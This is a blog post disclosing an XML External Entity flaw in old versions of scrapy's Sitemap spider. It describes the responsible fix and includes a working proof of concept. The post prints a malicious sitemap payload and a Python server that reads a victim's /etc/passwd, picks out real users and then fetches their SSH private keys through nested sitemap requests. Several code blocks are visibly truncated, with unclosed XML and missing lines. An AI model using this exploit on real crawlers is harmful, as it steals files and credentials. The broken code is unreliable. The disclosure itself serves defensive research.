SPECT Research

Security and Software Development

Home About us Projects Education

Exploiting the scraper

As some of you have noticed, the post frequency has been low in last years because I've been happily working full-time for more than two years at Scrapinghub, the company behind the popular scrapy framework. I've been working mostly on software projects not related to security so only in my spare time I dedicate time on it.

scrapy is a powerful framework to do web scraping and it usually doesn't involve server side things, unless you use the scrapyd project
to manage your scrapy spiders. So I was a bit worried about the security of this tool because I use it daily and any vulnerability would affect me (client-side).

Well, scrapy uses lxml under the hood to do HTML/XML processing and with the XML External Entity (XXE) attacks around, I wanted to test if scrapy was vulnerable to it in some way. Indeed, it was vulnerable as I described in this pull request and in this post I'll explain to you an automated way to exploit it.

Finding a vulnerable component

I knew that lxml was used at Selectors and some kind of spiders like Sitemap spider. Both components can handle XML files and were vulnerable since they initialized their instance of XMLParser in this way:

lxml.etree.XMLParser(recover=True, remove_comments=True)

According to the documentation, resolve_entities argument is True by default, which makes it vulnerable to the above mentioned XXE attacks.

Before starting the search of vulnerabilities, I'm always thinking about a successful exploitation. In this case, Selectors weren't a good spot since I could create a malicious XML file, serve it in a web server, a scrapy spider would have parsed it and the vulnerability would have been triggered but I didn't have a way to get that data back to me.

On the other side, from my experience I had seen that sitemaps sometimes contain nested sitemap and they are always requested, so in that way I could keep a flow between a server controlled by me and the victim scrapy spider. That's the choosen path to exploit this vulnerability.

A bit more about sitemaps and Sitemap spider

Sitemaps are files that sites uses to index content instead of crawling the whole site to access every item. They usually contains url sets, but there's the chance to contain more sitemaps. Sitemap spider will request normal url sets and call a callback, so we can't get the data of a successful attack from that. But we could nest XML sitemaps and create dynamic responses always containing a sitemap, so we could keep a flow with the victim spider.

Exploiting the vulnerability in a automated way

To exploit this vulnerability we need a victim using the Sitemap spider. An example of this would be this simple spider:

from scrapy.contrib.spiders import SitemapSpider

class TestSpider(SitemapSpider):
    name = 'test'
    sitemap_urls = ['http://localhost:5000/sitemap.xml']

    def parse(self, response):

On the server side, the steps are:

  • Create a server listening on port 5000 (as the spider set in sitemap_urls).
  • Create a malicious XML file as explained below:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file://{file_path}" >
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">

We can set file_path to any file we want to read and our file contains a nested sitemap with the payload to trigger the vulnerability.

  • As you see from our malicious file, the next sitemap will be requested and in its path it will contain the contents of file_path. Now we have a way to get retrieve the data from the victim.
  • Do we want only a file? No. We can answer the last request with our malicious file and request more files.

Things get interesting when in the first response you put a payload to read /etc/passwd, receive the contents, recreate the list of real users (not system users) and in the next response you could read /home/%user/.ssh/id_rsa and bingo!

Two things to consider but that are fully implemented in the PoC: the sitemap loc needs to end in .xml and frameworks like Bottle or Flask couldn't handle the weird requests containing /etc/passwd contents so I had to use the built-in HTTP server.

The malicious server code is pasted below. It's just a PoC.

import re
import sys
import time
import BaseHTTPServer

from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote

sitemap_document = """<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file://{file_path}" >
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">

class WebServerHandler(SimpleHTTPRequestHandler):
    users = []

    def get_sitemap(self, file_path):
        """ .xml at the end makes it a valid XML file """
        loc = "<loc>http://localhost:5000/&xxe;.xml</loc>"
        return sitemap_document.format(file_path=file_path, content=loc)

    def parse_users(self, path):
        users = set([u for u in re.findall('/|0A([^:]+):x:', path) if u])
        system_users = set([
            'daemon', 'bin', 'sys', 'sync', 'games', 'man', 'lp', 'mail', 'news', 'uucp',
            'proxy', 'www-data', 'backup', 'list', 'irc', 'gnats', 'nobody', 'libuuid',
            'syslog', 'messagebus', 'usbmux', 'dnsmasq', 'avahi-autoipd', 'kernoops',
            'rtkit', 'whoopsie', 'speech-dispatcher', 'avahi', 'lightdm', 'pulse',
            'hplip', 'colord', 'saned', 'gdm', 'debian-spamd', 'sshd', 'statd', 'puppet',
            'landscape', 'pollinate'

        self.users = list(users - system_users)
        print('[+] Obtained users: %s' % ', '.join(self.users))

    def request_file(self):
        #First step is ask for /etc/passwd
        if not self.users:
            return self.get_sitemap('/etc/passwd')
            #Use first user for PoC
            user = self.users[0]
            return self.get_sitemap(sys.argv[1] % user)

    def do_GET(self):

        #Read requested URL in search of valuable data
        if 'root:x:0:0' in self.path:
        elif 'sitemap' not in self.path:
                content = unquote(re.findall('/(.*?)\.xml', self.path)[0])
                print("[+] Possible document: %s" % content)
                print("[-] Failed getting file")


        #Request next file
        content = self.request_file()

    def log_message(self, format, *args):

def setup_webserver(server_class=BaseHTTPServer.HTTPServer):
    """ Setup webserver for serve files """
    server_address = ('localhost', 5000)
    httpd = server_class(server_address, WebServerHandler)
        print('To exit, press Ctrl-c')
    except KeyboardInterrupt:
        print('Exiting ..')

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Use: python %s filename_to_get' % sys.argv[0])
        print('filename_to_get format: /home/%s/filename')


And a video showing the exploitation is here. It reads the local file flag.txt of the victim.


The pull request fixing the vulnerability was discussed with the scrapy dev team and in few days it was merged into master. It's always good to resolve security issues quickly.

I want to clarify that only versions <= 0.21 were vulnerable to this vulnerability. Even in Ubuntu repositories there are many patched versions available. After this, we agree on opening a security mailing list to address this kind of bugs, which is a good initiative and I expect to continue contribuiting to it.